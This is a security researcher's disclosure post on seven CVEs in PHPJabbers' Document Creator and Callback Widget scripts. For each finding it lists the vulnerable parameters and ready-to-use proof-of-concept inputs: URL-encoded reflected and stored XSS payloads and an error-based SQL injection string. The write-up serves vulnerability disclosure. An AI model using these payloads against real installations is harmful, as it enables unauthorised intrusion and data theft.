Multiple vulnerabilities in PHPJabbers — Part 1

Milan Fortin
4 min readAug 8, 2023

Today, I want to share some vulnerabilities discovered through a recent collaborative security research project. This was done through a local group called the Atlantic CyberSecurity Collective.

Our team, consisting of a diverse and talented group of researchers, has conducted an extensive security review on the PHPJabbers collection of scripts, and during our research, we came across some significant security vulnerabilities. It’s worth mentioning that these vulnerabilities, if exploited, could potentially pose serious threats to user data and the overall integrity of these products. We submitted our findings to MITRE, a globally recognized cybersecurity standards organization. Consequently, these vulnerabilities were validated and assigned the following Common Vulnerabilities and Exposures (CVE) identifiers:

  • CVE-2023–36309
  • CVE-2023–36310
  • CVE-2023–36311
  • CVE-2023–36312
  • CVE-2023–36313
  • CVE-2023–36314
  • CVE-2023–36315

Note that we are all professionals with full time jobs and other responsibilities. With the sheer amount of products in the PHP Jabbers lineup and limited time available, we weren’t able to assess every single product. There is a lot of code reuse in those applications, so it would be safe to assume most vulnerabilities are present in other products.

Members of the research group conducted some additional research in PHP Jabbers products and found vulnerabilities which aren’t addressed in this disclosure.

We informed the PHP Jabbers team through their online forms, but were completely ignored. Each of our attempts at communicating these vulnerabilities was met with silence and an almost instantaneous “closed” status to our submitted tickets.

Our intentions behind sharing this information aren’t to tarnish the vendor’s reputation or stir up panic among its user base. Instead, we aim to encourage proactive and transparent collaboration within the cybersecurity community. It’s crucial to remember that we all share the same goal — enhancing the overall security of products and fostering a safer digital world for users.

In the sections to follow, we will delve into each of the identified vulnerabilities:

#1: Reflected XSS in the action parameter of Document Creator

(CVE-2023–36309)

Replace the action parameter in a request to index.php value with %3Cimg+src%3Dx+onerror%3Dprompt%28%29%3E, it will direct to another page where our payload is executed.

#2: Reflected XSS in the column parameter of Document Creator

(CVE-2023–36310)

Replace the action parameter in a request to index.php value with %3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E.

#3: SQL injection in the column parameter of Document Creator

(CVE-2023–36311)

Replace the column parameter value with: 1 AND (SELECT 4172 FROM(SELECT COUNT(*),CONCAT(0x71786a7071,(SELECT (ELT(4172=4172,1))),0x716a6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&direction=ASC&row_count=15&page=18.

#4: Stored XSS in multiple POST parameters of the form fields in Callback Widget

(CVE-2023–36312)

We go to the “Options” tab, then to the “Form fields” tab under it.

All affected parameters can be exploited with the same payload.

The affected parameters are:

value-enum-o_bf_include_name, value-enum-o_bf_include_email, value-enum-o_bf_include_phone, value-enum-o_bf_include_company, value-enum-o_bf_include_address, value-enum-o_bf_include_country, value-enum-o_bf_include_state, value-enum-o_bf_include_city, value-enum-o_bf_include_zip, value-enum-o_bf_include_notes, value-enum-o_bf_include_captcha, value-enum-o_bf_include_calltime and value-enum-o_bf_include_timezone.

We capture the request once we save the form and edit the value of one of our vulnerable parameters to “%22%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E” then forward the request.

The script tag should now be stored in the form field.

#5: Reflected XSS in multiple POST parameters of export requests in Callback Widget

(CVE-2023–36313)

Go to “Callback Requests” -> “Export Requests”, fill the fields then click “Get Feed URL”, capture the request in Burp Suite.

Now in Burp Suite we will edit any POST parameter’s value to contain “%3C%2Ftextarea%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E%3C” except for the “request_feed” parameter which is not vulnerable or the “password” parameter which is instead vulnerable to the payload “%22%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E”, forward the request.

#6: Reflected XSS in notifications of Callback Widget

(CVE-2023–36314)

Go to “Options” -> “Notifications”, fill all the fields then submit the message to capture it in burp. Replace the value to “%3C%2Ftextarea%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E%3Ctextarea%3E” for any of the following parameters value-text-o_email_request_message, value-text-o_sms_request_message, value-text-o_admin_email_request_message or value-text-o_sms_email_request_message

#7: Reflected XSS in the action parameter of Callback Widget

(CVE-2023–36315)

Replace the value of the action parameter with %3Cimg%20src=x%20onerror=prompt()%3E&err=AO01

--

--